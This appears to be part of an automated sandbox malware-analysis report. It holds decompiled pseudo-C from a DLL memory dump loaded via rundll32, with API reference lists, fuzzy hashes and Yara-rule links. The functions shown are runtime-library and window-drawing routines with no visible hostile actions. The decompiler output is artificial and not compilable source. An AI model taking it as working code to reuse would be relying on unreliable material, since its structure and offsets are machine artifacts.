																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E10026850(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E10012120(_t226, _t265, _t284, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E100268B3(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E10026850(_t110, 2);
																																	E100268B3(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E10028A30( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E1000E341();
																																			asm("int3");
																																			_t166 =  *0x1004e384; // 0x3ab448
																																			__eflags = _t166 -  *0x1004e390; // 0x3ab448
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x1004e384 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E1002449E(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x1004e384; // 0x3ab448
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x1004e388 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x1004e384 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x1004e384 - _t226; // 0x3ab448
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x1004e388; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L10011782();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E1002941C();
																					L58:
																					_t300 =  *0x1004e388; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E100268B3(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E1002449E(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E10031BEE(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E1002449E(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x1004e384 = E10026850(1, 4);
										E100268B3(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x1004e384 - _t222; // 0x3ab448
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x1004e388 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x1004e388 = E10026850(1, 4);
												E100268B3(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x1004e388 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E100268B3(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x1004e388 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L1001177D();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E1002449E(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

APIs

_free.LIBCMT ref: 10028F06
_free.LIBCMT ref: 10028F33

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction ID: c9aa2e72dc3717b8aeb007e04fd68db8c0b5e47be17badfa8eb106a72592e22b
Opcode Fuzzy Hash: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction Fuzzy Hash: 91D15775D04355AFEB10EFB4AD85AAE77E4EF053D0F92426EF904D7281EB31AA008B54

Uniqueness

Uniqueness Score: -1.00%

Function 100014BD, Relevance: 24.1, APIs: 16, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100014BD(struct HWND__* _a4, int _a12, int _a16) {
				struct HDC__* _v8;
				int _v12;
				int _v16;
				intOrPtr _t32;
				struct HDC__* _t37;
				intOrPtr* _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t53;
				void* _t55;
				int _t58;
				intOrPtr* _t59;
				int _t63;
				intOrPtr* _t64;
				struct HDC__* _t65;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t53 =  *0x1004dc38; // 0x3a3cc0
					_t4 = _t53 + 4; // 0x3a3cc0
					_t32 =  *_t4;
					_t5 = _t32 + 8; // 0x0
					_t6 = _t32 + 0xc; // 0x0
					_v16 = _a12;
					_v12 = _a16;
					_push( &_v16);
					E10001102(_t55, _t53);
					_t37 = GetDC(_a4);
					_v8 = _t37;
					MoveToEx(_t37,  *_t5,  *_t6, 0);
					LineTo(_v8, _v16, _v12);
					_t40 =  *0x1004dc38; // 0x3a3cc0
					_t41 =  *_t40;
					_t63 =  *(_t41 + 0xc);
					_t58 =  *(_t41 + 8);
					LineTo(_v8, _t58, _t63);
					BeginPath(_v8);
					MoveToEx(_v8, _t58, _t63, 0);
					_t59 =  *0x1004dc38; // 0x3a3cc0
					_t64 =  *_t59;
					if(_t64 != _t59) {
						while(1) {
							_t64 =  *_t64;
							if(_t64 == _t59) {
								goto L6;
							}
							LineTo(_v8,  *(_t64 + 8),  *(_t64 + 0xc));
						}
					}
					L6:
					_t65 = _v8;
					CloseFigure(_t65);
					EndPath(_t65);
					_t47 =  *0x1004dbcc; // 0x0
					if(_t47 != 0) {
						DeleteObject(_t47);
						 *0x1004dbcc =  *0x1004dbcc & 0x00000000;
					}
					 *0x1004dbcc = PathToRegion(_t65);
					ReleaseDC(_a4, _t65);
					RedrawWindow(_a4, 0, 0, 0x105);
					 *0x1004dc34 = 0;
				}
				return 0;
			}

APIs

GetMenu.USER32 ref: 100014C6
GetSubMenu.USER32 ref: 100014CF
GetMenuState.USER32(00000000,000000CB,00000000), ref: 100014DD

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 10001527
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001535
LineTo.GDI32(?,?,?), ref: 10001544
LineTo.GDI32(?,?,?), ref: 1000155C
BeginPath.GDI32(?), ref: 10001565
MoveToEx.GDI32(?,?,?,00000000), ref: 10001572
LineTo.GDI32(?,?,?), ref: 1000158F
CloseFigure.GDI32(?), ref: 1000159F
EndPath.GDI32(?), ref: 100015A6
DeleteObject.GDI32(00000000), ref: 100015B6
PathToRegion.GDI32(?), ref: 100015C4
ReleaseDC.USER32(?,?), ref: 100015D3
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100015E5

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LineMenuPath$Move$BeginCloseDeallocateDeleteFigureObjectRedrawRegionReleaseStateWindow
String ID:
API String ID: 3279537990-0
Opcode ID: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction ID: 236d3021e18466ba726e930eba69d07649331866de6a3b4fa2b3998426ac5257
Opcode Fuzzy Hash: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction Fuzzy Hash: 8F310735A01224EFEB11AFA4CE88B8A7BB5FF4A351F518055FA05E7271C770A940DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1002E7A1, Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002E7A1(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				void* __edi;
				void* __ebp;
				signed int _t126;
				char _t129;
				char _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				intOrPtr* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				char _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t217;
				short* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed char _t235;
				signed char* _t236;
				void* _t237;
				char* _t239;
				char* _t240;
				signed char* _t251;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr* _t258;
				signed int _t259;
				short* _t260;
				signed int _t263;
				signed int _t264;
				void* _t265;
				void* _t266;

				_t233 = __edx;
				_t126 =  *0x1004d054; // 0xda1f8931
				_v8 = _t126 ^ _t264;
				_t254 = _a4;
				_t205 = 0;
				_v56 = _t254;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t254 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t254;
				_v88 = 0;
				if( *((intOrPtr*)(_t254 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t254 + 0x8c));
					if( *((intOrPtr*)(_t254 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t254 + 0x8c)) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t254 + 0x90)) = _t205;
					 *_t254 = 0x10044480;
					 *((intOrPtr*)(_t254 + 0x94)) = 0x10044700;
					 *((intOrPtr*)(_t254 + 0x98)) = 0x10044880;
					 *((intOrPtr*)(_t254 + 4)) = 1;
					L48:
					return E100037EA(_t129, _v8 ^ _t264, _t233);
				}
				_t131 = _t254 + 8;
				_v52 = 0;
				if( *(_t254 + 8) != 0) {
					L3:
					_v52 = E10026850(1, 4);
					E100268B3(_t205);
					_v32 = E10026850(0x180, 2);
					E100268B3(_t205);
					_t237 = E10026850(0x180, 1);
					_v44 = _t237;
					E100268B3(_t205);
					_v36 = E10026850(0x180, 1);
					E100268B3(_t205);
					_v40 = E10026850(0x101, 1);
					E100268B3(_t205);
					_t266 = _t265 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E100268B3(_v52);
						E100268B3(_v32);
						E100268B3(_t237);
						E100268B3(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *((char*)(_t147 + _t217)) = _t147;
								_t147 = _t147 + 1;
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t254 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E100318A5(_t284, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t285 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E100318A5(_t285, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t286 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E1002E537(0xff, _t286, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *((char*)(_t233 + 0x7f)) = _t205;
								_v80 = _t239;
								 *((char*)(_t222 + 0x7f)) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									_push(0x1f);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t165 = memcpy(_t164, _t164 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t258 = _v56;
									if( *((intOrPtr*)(_t258 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E100268B3( *((intOrPtr*)(_t258 + 0x90)) - 0xfe);
											E100268B3( *((intOrPtr*)(_t258 + 0x94)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x98)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x8c)));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *((intOrPtr*)(_t258 + 0x8c)) = _t166;
									 *_t258 = _v72;
									 *((intOrPtr*)(_t258 + 0x90)) = _v76;
									 *((intOrPtr*)(_t258 + 0x94)) = _v80;
									 *((intOrPtr*)(_t258 + 0x98)) = _v84;
									 *(_t258 + 4) = _v60;
									L44:
									E100268B3(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t254 + 8) != 0xfde9) {
									_t251 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t251[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t259 =  *_t251 & 0x000000ff;
										_v64 = _t259;
										__eflags = _t259 - (_t183 & 0x000000ff);
										if(_t259 > (_t183 & 0x000000ff)) {
											L37:
											_t251 =  &(_t251[2]);
											__eflags =  *_t251;
											if( *_t251 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t259;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t260 = _t207 - 0xffffff00 + _t259 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t260 = 0x8000;
											_t260 = _t260 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t251[1] & 0x000000ff);
										} while (_t230 <= (_t251[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t253 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t253 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t284 =  *(_t254 + 8) - 0xfde9;
							if( *(_t254 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t263 =  *_t236 & 0x000000ff;
									__eflags = _t263 - (_t197 & 0x000000ff);
									if(_t263 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t263 + _t232)) = 0x20;
										_t263 = _t263 + 1;
										__eflags = _t263 - (_t236[1] & 0x000000ff);
									} while (_t263 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t254 = _v56;
								goto L22;
							}
							E100050F0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t266 = _t266 + 0xc;
							goto L22;
						}
					}
				}
				_t204 = E10037D5C(__edx,  &_v92, 0, _t213, 0x1004, _t131);
				_t266 = _t265 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

APIs

_free.LIBCMT ref: 1002E810
_free.LIBCMT ref: 1002E826
_free.LIBCMT ref: 1002E839
_free.LIBCMT ref: 1002E84E
_free.LIBCMT ref: 1002E863
GetCPInfo.KERNEL32(?,?), ref: 1002E8AD

Part of subcall function 10037D5C: _free.LIBCMT ref: 10037DC7

_free.LIBCMT ref: 1002EB18
_free.LIBCMT ref: 1002EB2B
_free.LIBCMT ref: 1002EB39
_free.LIBCMT ref: 1002EB44
_free.LIBCMT ref: 1002EB86
_free.LIBCMT ref: 1002EB8E
_free.LIBCMT ref: 1002EB94
_free.LIBCMT ref: 1002EB9C
_free.LIBCMT ref: 1002EBAA

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction ID: a43070e0b0711e41ad9a0cb5ae2b548a2436ceb787582ea256af61a5ca8909b4
Opcode Fuzzy Hash: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction Fuzzy Hash: 7CD19E75D002859FDB11CFA4D881BEEBBF5FF08300F944169E995A7282DB71AD458B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7FB, Relevance: 19.8, APIs: 13, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B7FB(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				signed int* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				signed int _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x1004e004; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x1004e010 == 0 ||  *0x1004e011 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E1000723E( &_v108,  &_v44);
							E100076A6(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E10007637(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x1004e004; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E1000CF24(_t203,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E100076A6(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x1004e004 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x1004e004 = _t71;
							_t101 = E1000CF24(_t203,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E100071BE( &_v76, 0x1004e004, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E100076A6(E1000723E( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x1004dffc; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E100078F0(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if(__eflags != 0) {
								L31:
								_push( &_v204);
								_t122 = E10007637(_t177,  &_v212, 0x60, L10009B9E(_t164, _t177, _t203, _t204, _t206, __eflags));
								_t207 = _t207 + 0x10;
								_t101 = E100076C8(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x1004e004 = _t52;
							_t125 = E1000AB0E(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E100076A6(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x1004e004; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x1004e004 =  *0x1004e004 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x1004e004 = _t46;
							_t135 = E1000CF24(_t203,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E100076A6(E100076C8(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x1004e004 = _t18;
							while(1) {
								E1000CF24(_t203,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = _t204;
									if(_t204 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E10007748( &_v28,  &_v60);
										_t153 = E100076A6( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 = _t153[1];
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x1004e004; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E10007637(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E100076C8(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E1000A99E(_t177, _t203, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x1004e004; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E100076A6(E10007684(E100072DE( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E10007596(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

APIs

DName::operator+.LIBCMT ref: 1000B866
DName::operator+.LIBCMT ref: 1000B99C

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+.LIBCMT ref: 1000B9E8
DName::operator+.LIBCMT ref: 1000B9F7
DName::operator+.LIBCMT ref: 1000B952

